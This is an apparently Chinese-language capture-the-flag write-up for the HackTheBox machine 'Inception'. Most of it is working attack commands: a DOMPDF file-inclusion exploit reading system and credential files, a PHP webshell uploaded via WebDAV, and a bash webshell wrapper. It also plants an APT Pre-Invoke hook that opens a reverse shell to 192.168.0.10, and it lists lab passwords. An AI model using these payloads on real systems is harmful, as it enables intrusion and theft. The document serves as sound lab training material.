Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.67 | TCP:80,3128 |
$ ip='10.10.10.67'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
DOM-PDF LFI
http://10.10.10.67/
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图](https://img.4awl.net/img/87/54be29b6c397961d8fba1907c5f226.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图")
http://10.10.10.67:3128/
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图1](https://img.4awl.net/img/30/2b21fbf0af8edb616a392cb15e6fbf.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图1")
$ feroxbuster -u 'http://10.10.10.67/'
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图2](https://img.4awl.net/img/12/2a792a86713cce6a2adce8e82cce48.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图2")
http://10.10.10.67/dompdf/README.md
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图3](https://img.4awl.net/img/5d/0283b6925da1613455ccdce78ec0e1.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图3")
http://10.10.10.67/dompdf/VERSION
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图4](https://img.4awl.net/img/df/dff6ef10eb85b6cc57d9b45fd80497.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图4")
https://www.exploit-db.com/exploits/33004
$ curl 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd'
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图5](https://img.4awl.net/img/e9/2a873b6ec90467f24eac365b1e4ab7.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图5")
$ curl -s 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf' |grep -oE '[A-Za-z0-9+/=]{20,}' | tr -d '\n' | base64 -d
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图6](https://img.4awl.net/img/70/55952067e972d9f472b11807e9b7e8.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图6")
$ curl -s 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd' |grep -oE '[A-Za-z0-9+/=]{20,}' | tr -d '\n' | base64 -d
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图7](https://img.4awl.net/img/bc/7d6c82f2c72ea497f8d9f45840e7d5.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图7")
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图8](https://img.4awl.net/img/71/a1de4bb2abfddef088c280c7b040dd.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图8")
username:webdav_tester
password:babygurl69
davtest && Webshell
Web 分布式创作和版本控制 (WebDAV) 是一种 HTTP 扩展,旨在允许人们使用 HTTP 创建和修改网站。它最初始于 1996 年。
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图9](https://img.4awl.net/img/7f/0e0a503a9285d3befdd1d6929b6fc4.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图9")
$ davtest -url http://10.10.10.67/webdav_test_inception -auth webdav_tester:babygurl69
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图10](https://img.4awl.net/img/ad/b1e87dfd1364af32798e0fde01f981.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图10")
$ echo '<?php system($_GET[cmd]); ?>' > rev.php
$ curl -X PUT http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/rev.php -d @rev.php
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图11](https://img.4awl.net/img/58/daabd85b0957b6b63942da5969f770.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图11")
#!/bin/bash
URL='http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/rev.php?cmd='
while true; do
read -p "webdav-shell> " cmd
if [[ "$cmd" == "exit" ]]; then
echo "[+] Exiting shell..."
break
fi
encoded_cmd=$(echo -n "$cmd" | jq -sRr @uri)
curl -s "${URL}${encoded_cmd}"
echo
done
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图12](https://img.4awl.net/img/2c/d1c9787f19fa01e6305e1091343c72.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图12")
www-data -> cobb : Squid Unauthorized access
webdav-shell> cat /var/www/html/wordpress_4.8.3/wp-config.php
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图13](https://img.4awl.net/img/84/102d6df9fec5ef54fb235629780420.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图13")
username:root
password:VwPddNh7xMZyDQoByQL4
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图14](https://img.4awl.net/img/d8/ca63d0cfb39374b30d393050ac4c79.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图14")
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图15](https://img.4awl.net/img/90/7541541cc40556640afaa5b05b1434.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图15")
$ proxychains -f ./proxychains.conf ssh cobb@127.0.0.1
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图16](https://img.4awl.net/img/17/5ee957ba1bf8f728c008105e672fbf.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图16")
User.txt
a5b6db2fa5bfe8a677c41ec3b01b2ba6
Privilege Escalation:FTP + TFTP && Apt Pre-Invoke Script
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图17](https://img.4awl.net/img/ea/7ca51e646aa3a80feb0d41c26bf1d5.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图17")
$ sudo su
$ proxychains -f ./proxychains.conf ssh -D 1080 cobb@127.0.0.1
$ proxychains -f ./proxychains1080.conf scp pspy64 cobb@127.0.0.1:/tmp/pspy64
$ proxychains -f ./proxychains1080.conf scp linpeas.sh cobb@127.0.0.1:/tmp/linpeas.sh
扫描C端
$ nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused
Connection to 192.168.0.1 21 port [tcp/ftp] succeeded!
Connection to 192.168.0.1 22 port [tcp/ssh] succeeded!
Connection to 192.168.0.1 53 port [tcp/domain] succeeded!
$ ftp 192.168.0.1
在ftp内无法上传文件。通过读取宿主机的cron任务得知每五分钟会运行一次apt update命令
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * root apt update 2>&1 >/var/log/apt/custom.log
30 23 * * * root apt upgrade -y 2>&1 >/dev/null
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图18](https://img.4awl.net/img/91/5f7ff0ec7e2fced639b7e5ff52b4b8.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图18")
$ tftp 192.168.0.1
tftp> put /tmp/exp /tmp/exp
可以通过tftp上传文件
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图19](https://img.4awl.net/img/2a/8dad528ce81277791f8ae3cf6cd0b6.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图19")
靶机宿主:
00exp内容
APT::Update::Pre-Invoke {"/bin/bash /tmp/rev.sh"}
/tmp/rev.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.0.10/9911 0>&1
$ tftp 192.168.0.1
tftp> put /tmp/00exp /etc/apt/apt.conf.d/00exptftp> put /tmp/rev.sh /tmp/rev.sh
$ nc -lvnp 9911
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图20](https://img.4awl.net/img/73/bd695460bc42c1f6aa305949038019.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图20")
靶机容器:
$ nc -lvnp 9911
![[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图21](https://img.4awl.net/img/0f/ffd21aa080835a84233fdf71f6b8d2.jpg "[Meachines] [Medium] Inception DOM-PDF LFI+davtest+Squid未授权访问+ Apt Pre-Invoke权限提升插图21")
root.txt
d208effa777aa4489c26d2772723190c
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
